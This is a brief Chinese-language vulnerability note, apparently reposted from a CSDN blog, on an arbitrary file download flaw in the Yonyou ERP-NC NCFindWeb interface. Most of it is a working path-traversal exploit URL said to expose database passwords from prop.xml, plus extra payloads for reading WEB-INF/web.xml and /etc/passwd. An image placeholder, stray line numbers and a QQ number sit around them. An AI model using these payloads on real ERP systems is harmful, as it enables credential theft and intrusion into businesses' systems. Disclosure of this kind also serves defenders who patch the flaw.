用友ERP-NC系统漏洞 NCFindWeb接口任意文件下载

该漏洞权限比较大，可以获取数据库,/etc/passwd等信息，漏洞存在链接： http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码
在这里插入图片描述

WEB-INF/web.xml
../../../../../etc/passwd
1
2

原文：https://blog.csdn.net/weixin_46081055/article/details/119185699

ERP

QQ：769220720